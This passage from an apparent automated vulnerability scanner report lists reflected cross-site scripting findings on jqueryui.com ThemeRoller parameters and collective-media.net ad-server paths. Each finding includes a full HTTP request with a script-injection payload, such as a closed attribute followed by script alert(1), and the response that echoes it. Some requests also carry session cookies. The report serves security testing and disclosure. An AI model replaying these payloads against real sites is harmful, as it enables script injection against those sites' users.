ffsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:05:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
e=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ffbe373"><script>alert(1)</script>882164f26de&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay
...[SNIP]...

4.635. http://jqueryui.com/themeroller/ [iconColorHover parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the iconColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a060e"><script>alert(1)</script>574464c1df9 was submitted in the iconColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545a060e"><script>alert(1)</script>574464c1df9&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:04:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
t=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545a060e"><script>alert(1)</script>574464c1df9&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpa
...[SNIP]...

4.636. http://jqueryui.com/themeroller/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload adba1"><script>alert(1)</script>92436fbe461 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?adba1"><script>alert(1)</script>92436fbe461=1 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 04:51:36 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 117121

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&adba1"><script>alert(1)</script>92436fbe461=1" type="text/css" media="all" />
...[SNIP]...

4.637. http://jqueryui.com/themeroller/ [offsetLeftShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the offsetLeftShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c570e"><script>alert(1)</script>afcffadfccf was submitted in the offsetLeftShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxc570e"><script>alert(1)</script>afcffadfccf&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:07:40 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8pxc570e"><script>alert(1)</script>afcffadfccf&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.638. http://jqueryui.com/themeroller/ [offsetTopShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the offsetTopShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6de88"><script>alert(1)</script>154c7b1f564 was submitted in the offsetTopShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px6de88"><script>alert(1)</script>154c7b1f564&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:07:30 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
aaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px6de88"><script>alert(1)</script>154c7b1f564&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.639. http://jqueryui.com/themeroller/ [opacityOverlay parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the opacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 112ed"><script>alert(1)</script>7d0c4e6853f was submitted in the opacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30112ed"><script>alert(1)</script>7d0c4e6853f&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:06:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30112ed"><script>alert(1)</script>7d0c4e6853f&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all
...[SNIP]...

4.640. http://jqueryui.com/themeroller/ [opacityShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the opacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b44f"><script>alert(1)</script>4183a5e6bd3 was submitted in the opacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=305b44f"><script>alert(1)</script>4183a5e6bd3&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:07:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=305b44f"><script>alert(1)</script>4183a5e6bd3&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.641. http://jqueryui.com/themeroller/ [thicknessShadow parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/themeroller/

Issue detail

The value of the thicknessShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3000"><script>alert(1)</script>0be6e99973d was submitted in the thicknessShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxb3000"><script>alert(1)</script>0be6e99973d&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 05:07:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 2
Content-Length: 120067

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8pxb3000"><script>alert(1)</script>0be6e99973d&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

4.642. http://k.collective-media.net/cmadj/cm.quadbostonherald/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.quadbostonherald/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bf40'-alert(1)-'81a8eb9bf10 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/cm.quadbostonherald4bf40'-alert(1)-'81a8eb9bf10/;sz=300x250;net=cm;ord=[timestamp];env=ifr;ord1=901204;cmpgurl=http%253A//www.bostonherald.com/track/? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:44:29 GMT
Connection: close
Content-Length: 8181

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-18380300_1296265469","http://ib.adnxs.com/ptj?member=311&inv_code=cm.quadbostonherald4bf40'-alert(1)-'81a8eb9bf10&size=300x250&referrer=http%3A%2F%2Fwww.bostonherald.com%2Ftrack%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonherald4bf40%27-alert%281%29-%2781a8eb9bf10%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-18380
...[SNIP]...

4.643. http://k.collective-media.net/cmadj/cm.quadbostonherald/ [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.quadbostonherald/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9a0a3'-alert(1)-'5a9d9390595 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/cm.quadbostonherald/;sz=9a0a3'-alert(1)-'5a9d9390595 HTTP/1.1
Host: k.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; dp1=1; cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; qcms=1; mmpg=1; targ=1; blue=1; apnx=1; rdst8=1; rdst7=1; nadp=1; rdst4=1; rdst3=1; qcdp=1;

Response

4.644. http://k.collective-media.net/cmadj/cm.rev_bostonherald/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://k.collective-media.net
Path:	/cmadj/cm.rev_bostonherald/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 829d0'-alert(1)-'5bab6147ab2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cmadj/cm.rev_bostonherald829d0'-alert(1)-'5bab6147ab2/;sz=300x250;net=cm;ord=0.3579352851957083;env=ifr;ord1=199062;cmpgurl=http%253A//ad.afy11.net/ad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0? HTTP/1.1
Host: k.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Vary: Accept-Encoding
Date: Sat, 29 Jan 2011 01:44:19 GMT
Connection: close
Set-Cookie: qcms=1; domain=collective-media.net; path=/; expires=Sun, 30-Jan-2011 01:44:19 GMT
Set-Cookie: rdst7=1; domain=collective-media.net; path=/; expires=Sun, 29-May-2011 01:44:19 GMT
Set-Cookie: rdst8=1; domain=collective-media.net; path=/; expires=Sun, 29-May-2011 01:44:19 GMT
Set-Cookie: dp1=1; domain=collective-media.net; path=/; expires=Sun, 29-May-2011 01:44:19 GMT
Content-Length: 8704

function cmIV_(){var a=this;this.ts=null;this.tsV=null;this.te=null;this.teV=null;this.fV=false;this.fFV=false;this.fATF=false;this.nLg=0;this._ob=null;this._obi=null;this._id=null;this._ps=null;this.
...[SNIP]...
<scr'+'ipt language="Javascript">CollectiveMedia.createAndAttachAd("cm-53602374_1296265459","http://ib.adnxs.com/ptj?member=311&inv_code=cm.rev_bostonherald829d0'-alert(1)-'5bab6147ab2&size=300x250&referrer=http%3A%2F%2Fad.afy11.net%2Fad%3FasId%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26r
...[SNIP]...

4.645. http://k.collective-media.net/cmadj/cm.rev_bostonherald/ [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://k.collective-media.net
